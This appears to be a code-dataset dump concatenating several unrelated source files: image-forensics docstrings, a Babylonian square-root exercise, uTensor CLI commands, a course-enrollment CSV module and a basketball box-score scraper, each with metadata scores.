:return the new color image Convert to a mask with white indicating change :param img gray scale image :return image Determine if operation is global. Capture 'change size ratio' and 'change size category'. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Non-global operations, capturing 'change size ratio' and 'change size category'. 
:param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Perform SIFT regardless of the global change status, using an input mask from the parameters to select the source region. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: parameters :return: # a bit arbitrary. If there is a less than 50% overlap, then isolate the regions highlighted by the inputmask # otherwise just use the change mask for the transform. The change mask should be the full set of the pixels # changed and the input mask a subset of those pixels # want mask2 to be the region moved to # mask1 to be the region moved from Perform SIFT regardless of the global change status. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :return: Perform SIFT regardless of the global change status. If neighbor mask is is constructed, indicating the seams can be calculated, then mark as not Global. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: # global case and not a factor of 90 # skip video Use SIFT to build a homography for transform type changes that manipulated prior masks for probes. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Assume opacity is o such that outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255) IM = inverted mask IDM = inverted donor mask outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255) outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o outputImg - initialImage = o * (donorImage*IDM - initialImage*IM) o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM) Challenging since the donor mask is not lined up the image exactly. :param img1: :param img2: :param outputImg: :param mask: :return: # r = i(1-o) + t*o # r = i - o*i + t*o # r-i = o*t - o*i # r-i= o(t-i) # o = (r-i)/(t-i) If 'location change' is not in parameters or 'location change' is no, skip tis step. Otherwise, use SIFT to find a homography. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Divided up the size into segment_size ranges :param size: :param segment_size: :return: list of ranges as representd by tuples(start,end, last range indicator) Filter out points outside the 'window' surrounded by the buffer :param pt: :param xstart: :param xend: :param ystart: :param yend: :return: # store all the good matches as per Lowe's ratio test. 
# remove remaps outside the mask # fix nan's with no mapping Compute sparse maps from points between img1 to img2 :param img1: :param img2: :param mask1: :param mask2: @type img1: ImageWrapper @type img2: ImageWrapper :return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix # r = np.zeros(r.shape).astype('uint8') # for x in range(len(src_dts_pts[1])): # cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255) # r[int(x[0][1]),int(x[0][0])] = 255 Compute homography to transfrom img1 to img2 Apply the mask to each in order to only compare relevent regions of images :param img1: :param img2: :param mask1: :param mask2: @type img1: ImageWrapper @type img2: ImageWrapper :return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix # need as many as possible Resize the composite mask :param compositeMask: :param transform_matrix: :return: :param alist :param blist: :return: Since SIFT Cannot flip Flip the selected area :param compositeMask: :param mask: :param flip: :return: Loop through each level add apply the function. Need to convert levels to 0 and unmapped levels to 255 :param compositeMask: :param mask: :param transform_matrix: :return: Loop through each level add apply SIFT to transform the mask :param compositeMask: :param mask: :param transform_matrix: :return: @type destIm: ImageWrapper @type startIm: ImageWrapper Loop through each level add apply the rotation. Need to convert levels to 0 and unmapped levels to 255 :param img: :param angle: :param pivot: :return: Loop through each level add apply the transform. Need to convert levels to 0 and unmapped levels to 255 :param compositeMask: :param mask: :param transform_matrix: :return: Loop through each level add apply the rotation. Need to convert levels to 0 and unmapped levels to 255 :param rotation: :param compositeMask: :param edgeMask: :param expectedDims: :param local :return: # convert cornore to homogenous coordinates # convert points to lines # find point of intersection # find point of intersection # if the resulting lines intersect inside the box, fail # Or is more appropriate to look at the hull of the shape. # point = Point(x,y) # points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]] ##polygon = Polygon(points).convex_hull # return not polygon.contains(point) Ceate a new mask applying the transform to only those parts of the compositeMask that overlay with the provided mask. :param compositeMask: :param mask: 255 for unmanipulated pixels :param transform_matrix: :param invert: :param returnRaw: do merge back in the composite :return: # +cv2.CV_WARP_FILL_OUTLIERS # resize only occurs by user error. 
# zeros out areas outside the mask # put the areas outside the mask back into the composite # that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1] # Start from the right-most-bottom-most corner and # one by one store characters in lcs[] # If not same, then find the larger of two and # go in the direction of larger value # set to black if less than threshold # filter out noise in the mask # compute diff in 3 colors # use the biggest difference of the 3 colors # smooth out the histogram # find local minima # if there was no minima, hardcode # Use first minima # set to black if less than threshold # filter out noise in the mask # assumes crop, but this approach should be improved to use HOG comparisons # since some of these conversions occur with Raw images # see if there is crop information in exif #keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed # by final adjustments for size :param img1: :param img2: :param invert: :param arguments: :param alternativeFunction: :param convertFunction: :return: @type img1_wrapper: ImageWrapper @type img2_wrapper: ImageWrapper @type arguments: dict @rtype numpy.ndarray,dict # rotate image two if possible to compare back to image one. # The mask is not perfect. # res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1]))) # res[res<0.00001] = 0 # res[res>0] = 255 # # now crop out the rotation difference, to make sure the original image is not modified # if img1.shape != res.shape: # diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1]) # diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0) # res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])] If rawimg2 has an alpha channel, then the pixels then the high alpha value is the pixels that did not change :param rawimg1: :param rawimg2: :return: :param rawimg1: :param rawimg2: :param equalize_colors: :return: @type rawimg1: ImageWrapper @type rawimg2: ImageWrapper Return a tuple describing the bounding box (xl,xh,yl,yh) with the most likely match to the small image. Return a masking where img1 is bigger than img2 and img2 is likely a crop of img1. images are 16 bit unnsigned or floating point. @return change mask aligned to in img1 dimensions, dictionary of analysis keys @type img1: np.array @type img2: np.array :param changemask: :param startimage: :param finalimage: :return: @type changemask: ImageWrapper @type startimage: ImageWrapper @type finalimage: ImageWrapper Return a masking where img1 is smaller than img2 and img2 contains img1. z1 and z2 are expected to be PIL images # size is inverted due to Image's opposite of numpy arrays Takes an image and produce a mask where all black areas are white Trim a mask after seam carving :param image: :param mask: :param expectedSize: :return: # rotation may change the shape # transforms typical are created for local operations (not entire image) # inverse crop # if transform matrix provided and alternate path is taken above # if we are cutting, then do not want to use the edge mask as mask for transformation. # see the cut section below, where the transform occurs directly on the mask # this occurs in donor cases # inverse crop # res is the donor mask # edgeMask may be the overriding mask from a PasteSplice, thus in the same shape # The transfrom will convert to the target mask size of the donor path. # need to use target size since the expected does ot align with the donor paths. 
Performs same functionality as convertToMask, but takes and returns np array # population covariance to match Wang et. al. 2004 # compute (weighted) means # compute (weighted) variances and covariances # compute (weighted) mean of ssim project gray into Green :param maskprefix: :param starttime: :param suffix: :return: A mask file name using the provided components # group selection # frame selection in group (relative to start of group) # the smart numpy array # where to stop :return: @rtype: GrayBlockWriter :param filename: :param start_frame: :param start_time: :param end_frame: optional stopping point :return: @type filename: str @rtype: GrayBlockReader :param reader: :return: @type reader: GrayBlockReader @rtype: GrayBlockWriter Multiple Mask Segment per HDF5 File, one in each group. :param start_frame: :param start_time: :return: @type reader: GrayBlockReader :param reader: :param grp_no: :param start_frame: :param start_time: :param end_frame: determine end frame :return: One Mask Segment per HDF5 File. :param start_frame: :param start_time: :return: @type reader: GrayBlockReader #write blanks for the rest #clean up the mask file, leave the finished overlay Write Gray scale (Mask) images to a compressed block file Either build the Writer or the Validator Compare frames of two video masks to see if one is valid. #ffwd to where we want to be Write Gray scale (Mask) video images #write all the frames up to and including the mask frame #refigure time for the frame we actually write #date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time'] #nonmatches.append(e) | 1.844017 | 2 |
Listas de Python/Lista 3/EX03.py | 4RandomProgrammer/Python | 0 | 6616729 | #EX03L03
#Inputs
numinteracoes = int(input())
#var
kraiz = 0
k = 1
i = 0
j = 0
while i < numinteracoes:
q = float(input())
while j < 10:
kraiz = (k + q/k)/2
k = kraiz
j += 1
print(round(kraiz,2))
i += 1
j = 0
kraiz = 0
k = 1
| #EX03L03
#Inputs
numinteracoes = int(input())
#var
kraiz = 0
k = 1
i = 0
j = 0
while i < numinteracoes:
q = float(input())
while j < 10:
kraiz = (k + q/k)/2
k = kraiz
j += 1
print(round(kraiz,2))
i += 1
j = 0
kraiz = 0
k = 1
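# --- Hedged note (editor addition): the loop above is the Babylonian (Newton) iteration
# k_{n+1} = (k_n + q/k_n) / 2 for sqrt(q), run for a fixed 10 steps per input.
# A function form of the same computation, for clarity:
def babylonian_sqrt(q, steps=10):
    k = 1.0
    for _ in range(steps):
        k = (k + q / k) / 2
    return round(k, 2)
# e.g. babylonian_sqrt(2.0) == 1.41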
| en | 0.144521 | #EX03L03 #Inputs #var | 3.338872 | 3 |
utensor_cgen/cli/backend.py | uTensor/utensor_cgen | 49 | 6616730 | import os
from pprint import pformat
import click
from utensor_cgen import __version__
from utensor_cgen.api.backend import generate_config as _generate_config
from utensor_cgen.api.backend import get_backends, get_trans_methods
from utensor_cgen.backend.api import BackendManager
from .main import cli
@cli.command(name='list-backends', help='list all available backends')
@click.help_option('-h', '--help')
def list_backends():
backends = get_backends()
click.secho('Available backends:', fg='green', bold=True)
for backend in backends:
click.secho(
' - {}'.format(backend), fg='green'
)
return 0
@cli.command(name='list-trans-methods', help='list all available graph transformation')
@click.help_option('-h', '--help')
@click.option('--verbose', is_flag=True)
def list_trans_methods(verbose):
from pprint import pformat
trans_methods = get_trans_methods()
if verbose:
for name, trans_cls in trans_methods.items():
click.secho(name, fg='white', bold=True)
click.secho(trans_cls.__doc__, fg='yellow', bold=True)
else:
click.secho(
pformat(list(trans_methods.keys())),
fg='white', bold=True
)
return 0
@cli.command(name='list-support-ops', help='list all supported op in the backend')
@click.help_option('-h', '--help')
@click.option('--target', default='utensor', show_default=True)
@click.option('--config', default='utensor_cli.toml', show_default=True)
def list_support_ops(target, config):
from utensor_cgen.backend.api import BackendManager
if os.path.exists(config):
backend = BackendManager.get_backend(target).from_file(config)
else:
backend = BackendManager.get_backend(target)({})
click.secho(
pformat(backend.support_ops),
fg='white',
bold=True
)
@cli.command(name='generate-config', help='generate config toml file')
@click.help_option('-h', '--help')
@click.option('--target', required=True, help='target framework/platform')
@click.option('-o', '--output', default='utensor_cli.toml', metavar='CONFIG.toml', help='the output config file name')
def generate_config(target, output):
_generate_config(target, output)
click.secho(
'config file generated: {}'.format(output),
fg='white',
bold=True,
)
return 0
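# --- Hedged usage sketch (editor addition): driving the commands above without a shell.
# click.testing.CliRunner invokes the same `cli` group the console entry point uses; the
# `cli` group and the 'list-backends' command name come from this file, the helper itself
# is an assumption.
def demo_list_backends():
    from click.testing import CliRunner
    runner = CliRunner()
    result = runner.invoke(cli, ['list-backends'])
    return result.exit_code, result.output  # exit_code 0 and the backend list on success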
| import os
from pprint import pformat
import click
from utensor_cgen import __version__
from utensor_cgen.api.backend import generate_config as _generate_config
from utensor_cgen.api.backend import get_backends, get_trans_methods
from utensor_cgen.backend.api import BackendManager
from .main import cli
@cli.command(name='list-backends', help='list all available backends')
@click.help_option('-h', '--help')
def list_backends():
backends = get_backends()
click.secho('Available backends:', fg='green', bold=True)
for backend in backends:
click.secho(
' - {}'.format(backend), fg='green'
)
return 0
@cli.command(name='list-trans-methods', help='list all available graph transformation')
@click.help_option('-h', '--help')
@click.option('--verbose', is_flag=True)
def list_trans_methods(verbose):
from pprint import pformat
trans_methods = get_trans_methods()
if verbose:
for name, trans_cls in trans_methods.items():
click.secho(name, fg='white', bold=True)
click.secho(trans_cls.__doc__, fg='yellow', bold=True)
else:
click.secho(
pformat(list(trans_methods.keys())),
fg='white', bold=True
)
return 0
@cli.command(name='list-support-ops', help='list all supported op in the backend')
@click.help_option('-h', '--help')
@click.option('--target', default='utensor', show_default=True)
@click.option('--config', default='utensor_cli.toml', show_default=True)
def list_support_ops(target, config):
from utensor_cgen.backend.api import BackendManager
if os.path.exists(config):
backend = BackendManager.get_backend(target).from_file(config)
else:
backend = BackendManager.get_backend(target)({})
click.secho(
pformat(backend.support_ops),
fg='white',
bold=True
)
@cli.command(name='generate-config', help='generate config toml file')
@click.help_option('-h', '--help')
@click.option('--target', required=True, help='target framework/platform')
@click.option('-o', '--output', default='utensor_cli.toml', metavar='CONFIG.toml', help='the output config file name')
def generate_config(target, output):
_generate_config(target, output)
click.secho(
'config file generated: {}'.format(output),
fg='white',
bold=True,
)
return 0
| none | 1 | 2.102242 | 2 | |
src/main/python/classData/course_enrollment.py | jimwaldo/HarvardX-Tools | 3 | 6616731 | #!/usr/bin/env python
"""
Object definition and utility functions for the course enrollment file
Contains a definition of the course_enrollment object, that holds all of the
information found in the course enrollment file. There is a function that will
build a dictionary, keyed by user id, that holds the information. There is also
a function that will scrub badly-formed entries from the file.
Created on Mar 17, 2013
@author: waldo
"""
import logging
#from convertfiles import xmltocsv
class course_enrollment(object):
"""
A representation of the state kept concerning a student's enrollment
This object encapsulates the time of enrollment for a student. There isn't
much here other than the student id, the course id, and the date of enrollment
"""
def __init__(self, uid, course_id, enroll_d):
"""
Constructor for an object containing the enrollment state
Note that the id that is only relevant within the file is not part of this
object.
"""
self.uid = uid
self.course_id = course_id
self.enroll_d = enroll_d
def builddict(f):
"""
Build a dictionary of the enrollment date for a student
The dictionary that is returned by this function is indexed by student id.
The internal id that is stored in the raw data file is dropped, as it has no
meaning outside of this file.
Parameters
-----------
f: csv.reader
An open csv reader object that contains the course enrollment data
"""
retdict = {}
lineno = 0
for line in f:
lineno += 1
if len(line) != 4:
logging.warning('bad row size at line ' + str(lineno))
continue
[oid, user_id, course_id, enrolld] = line
rec = course_enrollment(user_id, course_id, enrolld)
retdict[user_id] = rec
return retdict
def readdict(fin):
"""
    Reconstruct a dictionary of enrollment information from an open .csv file previously created by writedict
Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates
a dictionary containing that enrollment data. Input is a csv.reader object.
Returns a dictionary, indexed by user id, where each line is a course enrollment object.
"""
retDict = {}
fin.next()
for [uid, cid, edate] in fin:
retDict[uid] = course_enrollment(uid, cid, edate)
return retDict
def writedict(fout, pDict):
"""
    Save a dictionary of enrollment data to an open .csv file, to be read back by readdict
Writes the contents of a course enrollment dictionary to an open csv file. The file will have
a human-readable header placed on it that will need to be skipped on reading.
"""
fout.writerow(['User id', 'Course id', 'Enrollment date'])
for u in iter(pDict):
fout.writerow([u, pDict[u].course_id, pDict[u].enroll_d])
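# --- Hedged round-trip sketch (editor addition): writedict/readdict take already-open
# csv.writer/csv.reader objects. readdict calls fin.next(), so the module targets
# Python 2 era csv readers; the file name below is an illustrative assumption.
def roundtrip_enrollments(enrollments, csv_path='enrollments.csv'):
    import csv
    with open(csv_path, 'wb') as raw_out:  # 'wb' per Python 2 csv conventions
        writedict(csv.writer(raw_out), enrollments)
    with open(csv_path, 'rb') as raw_in:
        return readdict(csv.reader(raw_in))  # dict keyed by user id, header row skipped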
# def scrubstate(f1, f2):
# """
# Clean up the state of a course enrollment csv file
#
# Reads through a csv file containing the course enrollment data, removing any
# lines that are of the wrong size. Produces a scrubbed csv file
#
# Parameters
# --------------
# f1: csv reader
# An open csv reader, containing the data to be cleaned up
# f2: csv writer
# An open csv writer, that will take all of the lines of the right
# size
# """
#
# xmltocsv.scrubcsv(f1, f2, 4)
| #!/usr/bin/env python
"""
Object definition and utility functions for the course enrollment file
Contains a definition of the course_enrollment object, that holds all of the
information found in the course enrollment file. There is a function that will
build a dictionary, keyed by user id, that holds the information. There is also
a function that will scrub badly-formed entries from the file.
Created on Mar 17, 2013
@author: waldo
"""
import logging
#from convertfiles import xmltocsv
class course_enrollment(object):
"""
A representation of the state kept concerning a student's enrollment
This object encapsulates the time of enrollment for a student. There isn't
much here other than the student id, the course id, and the date of enrollment
"""
def __init__(self, uid, course_id, enroll_d):
"""
Constructor for an object containing the enrollment state
Note that the id that is only relevant within the file is not part of this
object.
"""
self.uid = uid
self.course_id = course_id
self.enroll_d = enroll_d
def builddict(f):
"""
Build a dictionary of the enrollment date for a student
The dictionary that is returned by this function is indexed by student id.
The internal id that is stored in the raw data file is dropped, as it has no
meaning outside of this file.
Parameters
-----------
f: csv.reader
An open csv reader object that contains the course enrollment data
"""
retdict = {}
lineno = 0
for line in f:
lineno += 1
if len(line) != 4:
logging.warning('bad row size at line ' + str(lineno))
continue
[oid, user_id, course_id, enrolld] = line
rec = course_enrollment(user_id, course_id, enrolld)
retdict[user_id] = rec
return retdict
def readdict(fin):
"""
    Reconstruct a dictionary of enrollment information from an open .csv file previously created by writedict
Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates
a dictionary containing that enrollment data. Input is a csv.reader object.
Returns a dictionary, indexed by user id, where each line is a course enrollment object.
"""
retDict = {}
fin.next()
for [uid, cid, edate] in fin:
retDict[uid] = course_enrollment(uid, cid, edate)
return retDict
def writedict(fout, pDict):
"""
    Save a dictionary of enrollment data to an open .csv file, to be read back by readdict
Writes the contents of a course enrollment dictionary to an open csv file. The file will have
a human-readable header placed on it that will need to be skipped on reading.
"""
fout.writerow(['User id', 'Course id', 'Enrollment date'])
for u in iter(pDict):
fout.writerow([u, pDict[u].course_id, pDict[u].enroll_d])
# def scrubstate(f1, f2):
# """
# Clean up the state of a course enrollment csv file
#
# Reads through a csv file containing the course enrollment data, removing any
# lines that are of the wrong size. Produces a scrubbed csv file
#
# Parameters
# --------------
# f1: csv reader
# An open csv reader, containing the data to be cleaned up
# f2: csv writer
# An open csv writer, that will take all of the lines of the right
# size
# """
#
# xmltocsv.scrubcsv(f1, f2, 4)
| en | 0.921489 | #!/usr/bin/env python Object definition and utility functions for the course enrollment file Contains a definition of the course_enrollment object, that holds all of the information found in the course enrollment file. There is a function that will build a dictionary, keyed by user id, that holds the information. There is also a function that will scrub badly-formed entries from the file. Created on Mar 17, 2013 @author: waldo #from convertfiles import xmltocsv A representation of the state kept concerning a student's enrollment This object encapsulates the time of enrollment for a student. There isn't much here other than the student id, the course id, and the date of enrollment Constructor for an object containing the enrollment state Note that the id that is only relevant within the file is not part of this object. Build a dictionary of the enrollment date for a student The dictionary that is returned by this function is indexed by student id. The internal id that is stored in the raw data file is dropped, as it has no meaning outside of this file. Parameters ----------- f: csv.reader An open csv reader object that contains the course enrollment data Reconstruct a dictionary or enrollment information from an open .csv file previously created by writedict Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates a dictionary containing that enrollment data. Input is a csv.reader object. Returns a dictionary, indexed by user id, where each line is a course enrollment object. Save a dictionary or enrollment data to an open .csv file, to be written by readdict Writes the contents of a course enrollment dictionary to an open csv file. The file will have a human-readable header placed on it that will need to be skipped on reading. # def scrubstate(f1, f2): # """ # Clean up the state of a course enrollment csv file # # Reads through a csv file containing the course enrollment data, removing any # lines that are of the wrong size. Produces a scrubbed csv file # # Parameters # -------------- # f1: csv reader # An open csv reader, containing the data to be cleaned up # f2: csv writer # An open csv writer, that will take all of the lines of the right # size # """ # # xmltocsv.scrubcsv(f1, f2, 4) | 3.438041 | 3 |
grabstats/box_score.py | kndo/grabstats | 0 | 6616732 | """
"""
import os
from bs4 import BeautifulSoup
import pandas as pd
import requests
def _get_data_stat(row, data_stat, is_header=False):
if is_header:
return row.find('th', {'data-stat': data_stat}).text
return row.find('td', {'data-stat': data_stat}).text
def format_time(mp):
"""Convert minutes played from analog time to digital time.
:param str mp: minutes played, e.g. '24:30'
    :return float: e.g. 24.5
"""
(m, s) = mp.split(':')
digital = int(m) + int(s) / 60
return round(digital, 1)
class BoxScore:
def __init__(self, soup):
self.soup = soup
def get(self, team_name):
box_score = pd.DataFrame()
table = self.soup.find('table', {'id': f'box_{team_name}_{self.box_score_type}'})
rows = table.find('tbody').find_all('tr')
player_rows = [row for row in rows if row.td]
active_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'mp']
inactive_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'reason']
for data_stat in self.data_stats:
if data_stat == 'player':
is_header = True
else:
is_header = False
box_score[data_stat] = [_get_data_stat(row, data_stat, is_header)
for row in active_player_rows]
box_score['mp'] = box_score['mp'].apply(format_time)
return box_score
class BasicBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'basic'
self.data_stats = [
'player', 'mp',
'fg', 'fga', 'fg_pct',
# 'fg3', 'fg3a', 'fg3_pct',
# 'ft', 'fta', 'ft_pct',
# 'orb', 'drb', 'trb',
# 'ast', 'stl', 'blk',
# 'tov', 'pf',
'pts',
'plus_minus',
]
class AdvBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'advanced'
self.data_stats = [
'player', 'mp',
# 'ts_pct', 'efg_pct',
# 'fg3a_per_fga_pct', 'fta_per_fga_pct',
# 'orb_pct', 'drb_pct', 'trb_pct',
# 'ast_pct', 'stl_pct', 'blk_pct',
'tov_pct', 'usg_pct',
'off_rtg', 'def_rtg',
]
def box_scores_get_one(team_name, url):
"""Get the basic and advanced box scores for one team and one game.
:param str team_name: the capitalized abbreviated name, e.g. 'DEN'
:param str url: the URL to the box score page on basketball-reference.com
"""
page = requests.get(url).text
soup = BeautifulSoup(page, 'lxml')
basic = BasicBoxScore(soup).get(team_name.lower())
adv = AdvBoxScore(soup).get(team_name.lower())
basic['usg_pct'] = adv['usg_pct']
return basic, adv
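# --- Hedged usage sketch (editor addition): the abbreviation and URL below are placeholders,
# not real game data. box_scores_get_one scrapes one team's basic and advanced tables from a
# single basketball-reference box score page and copies usg_pct into the basic frame.
def demo_one_team_box_score():
    placeholder_url = 'https://www.basketball-reference.com/boxscores/EXAMPLE.html'  # placeholder
    basic_df, adv_df = box_scores_get_one('DEN', placeholder_url)
    return basic_df, adv_df  # pandas DataFrames, one row per active player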
def box_scores_get_many(schedule):
"""
:param pd.DataFrame schedule: contains game info for the schedule of games
:return tuple: to be finished ...
"""
basic_box_scores = []
adv_box_scores = []
for idx, row in schedule.iterrows():
game_date = row['DATE']
road_team_abbr = row['ROAD_TEAM_ABBR']
home_team_abbr = row['HOME_TEAM_ABBR']
box_score_url = row['BOX_SCORE_URL']
road_basic, road_adv = box_scores_get_one(road_team_abbr, box_score_url)
home_basic, home_adv = box_scores_get_one(home_team_abbr, box_score_url)
# BASIC BOX SCORE
# Road team
road_basic['DATE'] = game_date
road_basic['OWN_TEAM'] = road_team_abbr
road_basic['OPP_TEAM'] = home_team_abbr
road_basic['VENUE'] = 'R'
# Home team
home_basic['DATE'] = game_date
home_basic['OWN_TEAM'] = home_team_abbr
home_basic['OPP_TEAM'] = road_team_abbr
home_basic['VENUE'] = 'H'
basic = pd.concat([road_basic, home_basic])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%',
# 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS',
# '+/-', 'USG%', 'PACE'
# ]
# basic = basic[reordered_cols]
basic_box_scores.append(basic)
# ADVANCED BOX SCORE
# Road team
road_adv['DATE'] = game_date
road_adv['OWN_TEAM'] = road_team_abbr
road_adv['OPP_TEAM'] = home_team_abbr
road_adv['VENUE'] = 'R'
# Home team
home_adv['DATE'] = game_date
home_adv['OWN_TEAM'] = home_team_abbr
home_adv['OPP_TEAM'] = road_team_abbr
home_adv['VENUE'] = 'H'
adv = pd.concat([road_adv, home_adv])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%',
# 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg'
# ]
# adv = adv[reordered_cols]
adv_box_scores.append(adv)
return basic_box_scores, adv_box_scores
def to_csv(box_score, outfile):
    if os.path.isfile(outfile):
        header = False
    else:
        header = True
with open(outfile, 'a') as f:
box_score.to_csv(f, header=header, index=False) | """
"""
import os
from bs4 import BeautifulSoup
import pandas as pd
import requests
def _get_data_stat(row, data_stat, is_header=False):
if is_header:
return row.find('th', {'data-stat': data_stat}).text
return row.find('td', {'data-stat': data_stat}).text
def format_time(mp):
"""Convert minutes played from analog time to digital time.
:param str mp: minutes played, e.g. '24:30'
    :return float: e.g. 24.5
"""
(m, s) = mp.split(':')
digital = int(m) + int(s) / 60
return round(digital, 1)
class BoxScore:
def __init__(self, soup):
self.soup = soup
def get(self, team_name):
box_score = pd.DataFrame()
table = self.soup.find('table', {'id': f'box_{team_name}_{self.box_score_type}'})
rows = table.find('tbody').find_all('tr')
player_rows = [row for row in rows if row.td]
active_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'mp']
inactive_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'reason']
for data_stat in self.data_stats:
if data_stat == 'player':
is_header = True
else:
is_header = False
box_score[data_stat] = [_get_data_stat(row, data_stat, is_header)
for row in active_player_rows]
box_score['mp'] = box_score['mp'].apply(format_time)
return box_score
class BasicBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'basic'
self.data_stats = [
'player', 'mp',
'fg', 'fga', 'fg_pct',
# 'fg3', 'fg3a', 'fg3_pct',
# 'ft', 'fta', 'ft_pct',
# 'orb', 'drb', 'trb',
# 'ast', 'stl', 'blk',
# 'tov', 'pf',
'pts',
'plus_minus',
]
class AdvBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'advanced'
self.data_stats = [
'player', 'mp',
# 'ts_pct', 'efg_pct',
# 'fg3a_per_fga_pct', 'fta_per_fga_pct',
# 'orb_pct', 'drb_pct', 'trb_pct',
# 'ast_pct', 'stl_pct', 'blk_pct',
'tov_pct', 'usg_pct',
'off_rtg', 'def_rtg',
]
def box_scores_get_one(team_name, url):
"""Get the basic and advanced box scores for one team and one game.
:param str team_name: the capitalized abbreviated name, e.g. 'DEN'
:param str url: the URL to the box score page on basketball-reference.com
"""
page = requests.get(url).text
soup = BeautifulSoup(page, 'lxml')
basic = BasicBoxScore(soup).get(team_name.lower())
adv = AdvBoxScore(soup).get(team_name.lower())
basic['usg_pct'] = adv['usg_pct']
return basic, adv
def box_scores_get_many(schedule):
"""
:param pd.DataFrame schedule: contains game info for the schedule of games
:return tuple: to be finished ...
"""
basic_box_scores = []
adv_box_scores = []
for idx, row in schedule.iterrows():
game_date = row['DATE']
road_team_abbr = row['ROAD_TEAM_ABBR']
home_team_abbr = row['HOME_TEAM_ABBR']
box_score_url = row['BOX_SCORE_URL']
road_basic, road_adv = box_scores_get_one(road_team_abbr, box_score_url)
home_basic, home_adv = box_scores_get_one(home_team_abbr, box_score_url)
# BASIC BOX SCORE
# Road team
road_basic['DATE'] = game_date
road_basic['OWN_TEAM'] = road_team_abbr
road_basic['OPP_TEAM'] = home_team_abbr
road_basic['VENUE'] = 'R'
# Home team
home_basic['DATE'] = game_date
home_basic['OWN_TEAM'] = home_team_abbr
home_basic['OPP_TEAM'] = road_team_abbr
home_basic['VENUE'] = 'H'
basic = pd.concat([road_basic, home_basic])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%',
# 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS',
# '+/-', 'USG%', 'PACE'
# ]
# basic = basic[reordered_cols]
basic_box_scores.append(basic)
# ADVANCED BOX SCORE
# Road team
road_adv['DATE'] = game_date
road_adv['OWN_TEAM'] = road_team_abbr
road_adv['OPP_TEAM'] = home_team_abbr
road_adv['VENUE'] = 'R'
# Home team
home_adv['DATE'] = game_date
home_adv['OWN_TEAM'] = home_team_abbr
home_adv['OPP_TEAM'] = road_team_abbr
home_adv['VENUE'] = 'H'
adv = pd.concat([road_adv, home_adv])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%',
# 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg'
# ]
# adv = adv[reordered_cols]
adv_box_scores.append(adv)
return basic_box_scores, adv_box_scores
def to_csv(box_score, outfile):
    if os.path.isfile(outfile):
        header = False
    else:
        header = True
with open(outfile, 'a') as f:
